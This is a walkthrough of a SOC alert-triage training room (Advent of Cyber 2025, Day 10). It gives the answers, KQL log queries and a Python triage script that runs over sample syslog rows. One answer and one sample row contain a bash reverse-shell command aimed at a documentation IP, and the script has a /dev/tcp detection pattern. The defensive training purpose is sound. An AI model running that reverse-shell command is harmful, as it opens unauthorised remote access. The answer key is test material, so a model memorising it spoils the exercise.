SOC Alert Triaging - Tinsel Triage | Advent of Cyber 2025 - Day 10
This guide contains the answers to the SOC Alert Triaging - Tinsel Triage room and the steps needed to reach them.
Table of contents
Investigation Proper
-
How many entities are affected by the Linux PrivEsc - Polkit Exploit Attempt alert?
It may take a while to get access to the lab environment, so keep that in mind. It took a while for me as well. When you have access, make sure to configure the lab as described in the text.
For me the incidents and rules wouldn't load. I have tried it multiple times without success. I will try again later, when things quiet down a little.
It seems they have changed some things in the room. Instead of joining and configuring a lab, you can log into an already set-up lab. This seems to work much better.
Navigating to the incidents tab, we can now see all the incidents. Let's filter them on the "polkit" program. If we open one of these incidents, we can see how many entities it is related to.

Click for answer
10 -
What is the severity of the Linux PrivEsc - Sudo Shadow Access alert?
For this question we filter the list on "shadow". The first column will give us its severity.

Click for answer
High -
How many accounts were added to the sudoers group in the Linux PrivEsc - User Added to Sudo Group alert?
For this answer we can filter the list on "user added". This gives us many events and alerts, so we should look at the affected entities. These, however, contain not only accounts but also systems.

So we choose to view all entities, and in the next window we filter the entities list on "account".

Click for answer
4
Diving Deeper Into Logs
-
What is the name of the kernel module installed in websrv-01?
Filter the incidents on "kernel" and select all events in the details tab.

Here we can see a few events that list the name of the kernel module that was inserted.

Click for answer
malicious_mod.ko -
What is the unusual command executed within websrv-01 by the ops user?
We can change the KQL query to look only at events from the host 'websrv-01'.
// The query_now parameter represents the time (in UTC) at which the scheduled analytics rule ran to produce this alert.
set query_now = datetime(2025-12-12T03:28:52.0545899Z);
Syslog_CL
| where host_s == 'websrv-01'
| project TimeGenerated, host_s, Message
Here we can see an unusual command being issued.
Click for answer
/bin/bash -i >& /dev/tcp/198.51.100.22/4444 0>&1 -
What is the source IP address of the first successful SSH login to storage-01?
We will use a different KQL query this time:
set query_now = datetime(2025-10-30T05:09:25.9886229Z);
Syslog_CL
| where host_s == 'storage-01' and Message has 'sshd'
| project _timestamp_t, host_s, Message
There is one entry here with a source IP address.
Click for answer
172.16.0.12 -
What is the external source IP that successfully logged in as root to app-01?
For this question we look at events where the host is "app-01" and the message contains "root":
set query_now = datetime(2025-10-30T05:09:25.9886229Z);
Syslog_CL
| where host_s == 'app-01' and Message has 'root'
| project _timestamp_t, host_s, Message
Here we see two IP addresses, of which one is a private IP and the other a public IP.
Click for answer
203.0.113.45 -
Aside from the backup user, what is the name of the user added to the sudoers group inside app-01?
For this question we change our query to filter events where the message contains "user":
set query_now = datetime(2025-10-30T05:09:25.9886229Z);
Syslog_CL
| where host_s == 'app-01' and Message has 'user'
| project _timestamp_t, host_s, Message
Click for answer
deploy
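As an added example that is not part of the room or of this walkthrough, the Python script below applies the same checks the "Diving Deeper Into Logs" questions walk through by hand (the first accepted SSH login on a host, external versus internal source addresses for root logins, users added to the sudo group, and sudo commands that open /dev/tcp) over constructed syslog rows shaped like the Syslog_CL projection (_timestamp_t, host_s, Message). The hostnames, users and IP addresses mirror the walkthrough; the timestamps, process IDs and ports are made up. It classifies addresses by RFC 1918 membership rather than with Python's ipaddress.is_global, because that property treats the 203.0.113.0/24 documentation range as non-global and would mislabel the public IP in this room.

```python
"""Triage helpers for Linux syslog rows (added example, not the room's own code)."""
import ipaddress
import re

# Constructed sample rows in the shape of the Syslog_CL (_timestamp_t, host_s, Message)
# projection. Hosts, users and IPs mirror the walkthrough; everything else is made up.
SAMPLE_EVENTS = [
    ("2025-10-30T04:58:01Z", "storage-01", "sshd[2101]: Failed password for backup from 172.16.0.12 port 50122 ssh2"),
    ("2025-10-30T04:58:09Z", "storage-01", "sshd[2101]: Accepted password for backup from 172.16.0.12 port 50122 ssh2"),
    ("2025-10-30T05:01:44Z", "storage-01", "sshd[2140]: Accepted publickey for backup from 10.0.0.5 port 41200 ssh2"),
    ("2025-10-30T05:02:10Z", "app-01", "sshd[3310]: Accepted password for root from 192.168.10.7 port 39910 ssh2"),
    ("2025-10-30T05:03:37Z", "app-01", "sshd[3315]: Accepted password for root from 203.0.113.45 port 54020 ssh2"),
    ("2025-10-30T05:04:02Z", "app-01", "usermod[3340]: add 'backup' to group 'sudo'"),
    ("2025-10-30T05:04:02Z", "app-01", "usermod[3340]: add 'backup' to shadow group 'sudo'"),
    ("2025-10-30T05:04:15Z", "app-01", "usermod[3342]: add 'deploy' to group 'sudo'"),
    ("2025-10-30T05:04:15Z", "app-01", "usermod[3342]: add 'deploy' to shadow group 'sudo'"),
    ("2025-12-12T03:20:00Z", "websrv-01", "sudo: ops : TTY=pts/0 ; PWD=/home/ops ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx"),
    ("2025-12-12T03:27:50Z", "websrv-01", "sudo: ops : TTY=pts/0 ; PWD=/home/ops ; USER=root ; COMMAND=/bin/bash -i >& /dev/tcp/198.51.100.22/4444 0>&1"),
]

# Standard OpenSSH / shadow-utils / sudo message shapes.
SSH_ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted \S+ for (?P<user>\S+) from (?P<ip>[\d.]+) port \d+")
SUDO_GROUP_ADD = re.compile(r"usermod\[\d+\]: add '(?P<user>[^']+)' to group 'sudo'")
SUDO_CMD = re.compile(r"USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")
# Bash's /dev/tcp and /dev/udp pseudo-files give a shell a raw socket; their
# appearance in a sudo COMMAND is the kind of "unusual command" the room asks about.
NETWORK_PSEUDO_FILE = re.compile(r"/dev/(tcp|udp)/")

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip: str) -> bool:
    """True when the address falls inside an RFC 1918 private range."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def first_successful_ssh_login(events, host):
    """Return (timestamp, user, ip) of the earliest accepted SSH login on host, or None."""
    hits = []
    for ts, h, msg in events:
        if h != host:
            continue
        m = SSH_ACCEPTED.search(msg)
        if m:
            hits.append((ts, m["user"], m["ip"]))
    # Fixed-width ISO-8601 UTC timestamps sort chronologically as strings.
    return min(hits) if hits else None


def external_logins(events, host, user):
    """Source IPs outside RFC 1918 space that were accepted as `user` on host."""
    out = []
    for _, h, msg in events:
        if h != host:
            continue
        m = SSH_ACCEPTED.search(msg)
        if m and m["user"] == user and not is_internal(m["ip"]):
            out.append(m["ip"])
    return out


def users_added_to_sudo(events, host):
    """Distinct users usermod added to the sudo group on host, in log order."""
    seen = []
    for _, h, msg in events:
        if h != host:
            continue
        m = SUDO_GROUP_ADD.search(msg)
        if m and m["user"] not in seen:
            seen.append(m["user"])
    return seen


def suspicious_sudo_commands(events, host, user):
    """(timestamp, command) pairs where `user` ran a sudo command touching /dev/tcp or /dev/udp."""
    out = []
    for ts, h, msg in events:
        if h != host or f" {user} : " not in msg:
            continue
        m = SUDO_CMD.search(msg)
        if m and NETWORK_PSEUDO_FILE.search(m["cmd"]):
            out.append((ts, m["cmd"]))
    return out


if __name__ == "__main__":
    print("first SSH login on storage-01:", first_successful_ssh_login(SAMPLE_EVENTS, "storage-01"))
    print("external root logins on app-01:", external_logins(SAMPLE_EVENTS, "app-01", "root"))
    print("users added to sudo on app-01:", users_added_to_sudo(SAMPLE_EVENTS, "app-01"))
    print("suspicious sudo commands by ops on websrv-01:", suspicious_sudo_commands(SAMPLE_EVENTS, "websrv-01", "ops"))
```

The regexes deliberately ignore the "to shadow group" companion line that usermod writes alongside each group change, so a user is counted once per host; in Sentinel the equivalent filter is `Message has "to group 'sudo'"` followed by a `summarize` on the extracted user.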